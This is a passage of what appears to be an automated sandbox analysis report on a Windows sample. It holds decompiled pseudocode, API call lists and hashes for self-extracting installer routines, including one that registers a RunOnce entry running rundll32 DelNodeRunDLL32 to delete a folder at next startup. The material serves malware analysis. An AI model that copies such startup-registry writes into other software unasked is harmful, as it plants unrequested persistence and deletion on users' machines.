                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E010D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E010D681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E010D67C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, 0x10d9154, _t49 | _a12 | _a16);
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E010D681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E010D67C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, 0x10d9154, _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x010d44b9
                                                                                                                                                                                                                                            0x010d44c4
                                                                                                                                                                                                                                            0x010d44cb
                                                                                                                                                                                                                                            0x010d44d8
                                                                                                                                                                                                                                            0x010d44e4
                                                                                                                                                                                                                                            0x010d44eb
                                                                                                                                                                                                                                            0x010d44ee
                                                                                                                                                                                                                                            0x010d44ef
                                                                                                                                                                                                                                            0x010d44ef
                                                                                                                                                                                                                                            0x010d44f1
                                                                                                                                                                                                                                            0x010d44f7
                                                                                                                                                                                                                                            0x010d44f8
                                                                                                                                                                                                                                            0x010d467b
                                                                                                                                                                                                                                            0x010d44fe
                                                                                                                                                                                                                                            0x010d4509
                                                                                                                                                                                                                                            0x010d4518
                                                                                                                                                                                                                                            0x010d4525
                                                                                                                                                                                                                                            0x010d4562
                                                                                                                                                                                                                                            0x010d4568
                                                                                                                                                                                                                                            0x010d4568
                                                                                                                                                                                                                                            0x010d456b
                                                                                                                                                                                                                                            0x010d456b
                                                                                                                                                                                                                                            0x010d456d
                                                                                                                                                                                                                                            0x010d456e
                                                                                                                                                                                                                                            0x010d4572
                                                                                                                                                                                                                                            0x010d4578
                                                                                                                                                                                                                                            0x010d457c
                                                                                                                                                                                                                                            0x010d45cb
                                                                                                                                                                                                                                            0x010d4607
                                                                                                                                                                                                                                            0x010d4607
                                                                                                                                                                                                                                            0x010d460d
                                                                                                                                                                                                                                            0x010d4613
                                                                                                                                                                                                                                            0x010d4617
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d461d
                                                                                                                                                                                                                                            0x010d4623
                                                                                                                                                                                                                                            0x010d4626
                                                                                                                                                                                                                                            0x010d4628
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4628
                                                                                                                                                                                                                                            0x010d45cd
                                                                                                                                                                                                                                            0x010d45cd
                                                                                                                                                                                                                                            0x010d45cf
                                                                                                                                                                                                                                            0x010d45cf
                                                                                                                                                                                                                                            0x010d45d2
                                                                                                                                                                                                                                            0x010d45d2
                                                                                                                                                                                                                                            0x010d45d4
                                                                                                                                                                                                                                            0x010d45d5
                                                                                                                                                                                                                                            0x010d45db
                                                                                                                                                                                                                                            0x010d45de
                                                                                                                                                                                                                                            0x010d45e3
                                                                                                                                                                                                                                            0x010d45e9
                                                                                                                                                                                                                                            0x010d45ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d45f3
                                                                                                                                                                                                                                            0x010d45fd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4602
                                                                                                                                                                                                                                            0x010d45ed
                                                                                                                                                                                                                                            0x010d457e
                                                                                                                                                                                                                                            0x010d457e
                                                                                                                                                                                                                                            0x010d4580
                                                                                                                                                                                                                                            0x010d4580
                                                                                                                                                                                                                                            0x010d4583
                                                                                                                                                                                                                                            0x010d4583
                                                                                                                                                                                                                                            0x010d4585
                                                                                                                                                                                                                                            0x010d4586
                                                                                                                                                                                                                                            0x010d458a
                                                                                                                                                                                                                                            0x010d458c
                                                                                                                                                                                                                                            0x010d458f
                                                                                                                                                                                                                                            0x010d458f
                                                                                                                                                                                                                                            0x010d4591
                                                                                                                                                                                                                                            0x010d4592
                                                                                                                                                                                                                                            0x010d459b
                                                                                                                                                                                                                                            0x010d459e
                                                                                                                                                                                                                                            0x010d45a3
                                                                                                                                                                                                                                            0x010d45a9
                                                                                                                                                                                                                                            0x010d45ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d45af
                                                                                                                                                                                                                                            0x010d45af
                                                                                                                                                                                                                                            0x010d45bf
                                                                                                                                                                                                                                            0x010d462d
                                                                                                                                                                                                                                            0x010d4630
                                                                                                                                                                                                                                            0x010d463d
                                                                                                                                                                                                                                            0x010d464e
                                                                                                                                                                                                                                            0x010d464e
                                                                                                                                                                                                                                            0x010d463f
                                                                                                                                                                                                                                            0x010d4640
                                                                                                                                                                                                                                            0x010d4647
                                                                                                                                                                                                                                            0x010d464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d464c
                                                                                                                                                                                                                                            0x010d4666
                                                                                                                                                                                                                                            0x010d466d
                                                                                                                                                                                                                                            0x010d466f
                                                                                                                                                                                                                                            0x010d4675
                                                                                                                                                                                                                                            0x010d4675
                                                                                                                                                                                                                                            0x010d45ad
                                                                                                                                                                                                                                            0x010d4527
                                                                                                                                                                                                                                            0x010d452e
                                                                                                                                                                                                                                            0x010d453f
                                                                                                                                                                                                                                            0x010d453f
                                                                                                                                                                                                                                            0x010d4530
                                                                                                                                                                                                                                            0x010d4531
                                                                                                                                                                                                                                            0x010d4538
                                                                                                                                                                                                                                            0x010d453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d453d
                                                                                                                                                                                                                                            0x010d4554
                                                                                                                                                                                                                                            0x010d455a
                                                                                                                                                                                                                                            0x010d455a
                                                                                                                                                                                                                                            0x010d455a
                                                                                                                                                                                                                                            0x010d4525
                                                                                                                                                                                                                                            0x010d468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 010D45A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 010D45E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 010D460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 010D4630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,010D9154,00000000), ref: 010D4666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 010D466F
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010D686E
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: GetSystemMetrics.USER32(0000004A), ref: 010D68A7
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010D68CC
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,?,0000000C), ref: 010D68F4
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: RegCloseKey.ADVAPI32(?), ref: 010D6902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • LoadString() Error. Could not load string resource., xrefs: 010D44E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.
                                                                                                                                                                                                                                            • API String ID: 3244514340-1556763079
                                                                                                                                                                                                                                            • Opcode ID: ea9ceda4261ec7d4d56bc8b88bcb2e7bef03217f8872b5618fac4c3a17f4a7ce
                                                                                                                                                                                                                                            • Instruction ID: b98619aa3fb895b70509fdeabf313a681244a6680a0bdbe5e15455759a6033c0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea9ceda4261ec7d4d56bc8b88bcb2e7bef03217f8872b5618fac4c3a17f4a7ce
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB510676A0131AABDB219E28CC48BBA7BB8EF45300F014194FD89E7649DB36D945CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                                                            			E010D2267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0x10d8530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E010D658A( &_v268, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							E010D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_t47 = 0x10d91e4;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x010d2272
                                                                                                                                                                                                                                            0x010d2277
                                                                                                                                                                                                                                            0x010d2279
                                                                                                                                                                                                                                            0x010d2283
                                                                                                                                                                                                                                            0x010d2289
                                                                                                                                                                                                                                            0x010d22ab
                                                                                                                                                                                                                                            0x010d22b1
                                                                                                                                                                                                                                            0x010d22c4
                                                                                                                                                                                                                                            0x010d22e0
                                                                                                                                                                                                                                            0x010d22e6
                                                                                                                                                                                                                                            0x010d22f5
                                                                                                                                                                                                                                            0x010d230d
                                                                                                                                                                                                                                            0x010d231c
                                                                                                                                                                                                                                            0x010d231c
                                                                                                                                                                                                                                            0x010d233a
                                                                                                                                                                                                                                            0x010d2342
                                                                                                                                                                                                                                            0x010d2348
                                                                                                                                                                                                                                            0x010d234b
                                                                                                                                                                                                                                            0x010d234c
                                                                                                                                                                                                                                            0x010d234c
                                                                                                                                                                                                                                            0x010d234e
                                                                                                                                                                                                                                            0x010d234f
                                                                                                                                                                                                                                            0x010d236e
                                                                                                                                                                                                                                            0x010d236e
                                                                                                                                                                                                                                            0x010d237a
                                                                                                                                                                                                                                            0x010d2380
                                                                                                                                                                                                                                            0x010d2380
                                                                                                                                                                                                                                            0x010d2381
                                                                                                                                                                                                                                            0x010d2381
                                                                                                                                                                                                                                            0x010d238f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010D22A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 010D22D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D22F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D2305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010D236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 010D237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 3027380567-1330155338
                                                                                                                                                                                                                                            • Opcode ID: 0291c63ee397878c55fbbb439a087610a14775c93b008bec8ec168c67efe0be3
                                                                                                                                                                                                                                            • Instruction ID: c137d7a711cb86dc6ca05b9c074a56bfa38d99d32b4e2c0ec5b5ba32ee181130
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0291c63ee397878c55fbbb439a087610a14775c93b008bec8ec168c67efe0be3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2531D971A00318ABDB719B65DC48FEA7B7CEF54740F0041E9F98DAB004DA756B84CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E010D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x010d4699
                                                                                                                                                                                                                                            0x010d469b
                                                                                                                                                                                                                                            0x010d46a9
                                                                                                                                                                                                                                            0x010d46af
                                                                                                                                                                                                                                            0x010d46b4
                                                                                                                                                                                                                                            0x010d46bc
                                                                                                                                                                                                                                            0x010d46f9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d46f9
                                                                                                                                                                                                                                            0x010d46d9
                                                                                                                                                                                                                                            0x010d46dd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d46e5
                                                                                                                                                                                                                                            0x010d46ef
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d46f5
                                                                                                                                                                                                                                            0x010d46ff

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE
                                                                                                                                                                                                                                            • API String ID: 3370778649-3697457883
                                                                                                                                                                                                                                            • Opcode ID: c40f13e36e2a3ec91f60b08379c6405ce1d73a988167c8742d1b48fb5f47b467
                                                                                                                                                                                                                                            • Instruction ID: 50e26eaa64510117a486db407930dfd80ccb46045f9786cd11c34179b86816c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c40f13e36e2a3ec91f60b08379c6405ce1d73a988167c8742d1b48fb5f47b467
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC016D36345310FBE3701AA96C4DF6B7E6CDB89BA2F044014FFCAD7184C9B6884587A6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E010D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0x10d8590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0x10d8590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E010D43D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0x10d8d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, 0x10d9154);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0x10d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E010D30C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x010d3108
                                                                                                                                                                                                                                            0x010d310b
                                                                                                                                                                                                                                            0x010d31b7
                                                                                                                                                                                                                                            0x010d31ca
                                                                                                                                                                                                                                            0x010d31d0
                                                                                                                                                                                                                                            0x010d31d0
                                                                                                                                                                                                                                            0x010d31da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d31da
                                                                                                                                                                                                                                            0x010d3111
                                                                                                                                                                                                                                            0x010d3114
                                                                                                                                                                                                                                            0x010d3136
                                                                                                                                                                                                                                            0x010d3136
                                                                                                                                                                                                                                            0x010d3138
                                                                                                                                                                                                                                            0x010d313b
                                                                                                                                                                                                                                            0x010d3141
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3143
                                                                                                                                                                                                                                            0x010d3116
                                                                                                                                                                                                                                            0x010d311b
                                                                                                                                                                                                                                            0x010d314b
                                                                                                                                                                                                                                            0x010d3151
                                                                                                                                                                                                                                            0x010d3158
                                                                                                                                                                                                                                            0x010d316a
                                                                                                                                                                                                                                            0x010d3176
                                                                                                                                                                                                                                            0x010d317d
                                                                                                                                                                                                                                            0x010d318b
                                                                                                                                                                                                                                            0x010d319e
                                                                                                                                                                                                                                            0x010d31a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d31ad
                                                                                                                                                                                                                                            0x010d3120
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d312a
                                                                                                                                                                                                                                            0x010d3134
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3134
                                                                                                                                                                                                                                            0x010d312c
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 010D313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 010D316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D3176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 010D317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 010D3185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 010D3190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,010D30C0), ref: 010D31A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010D31CA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
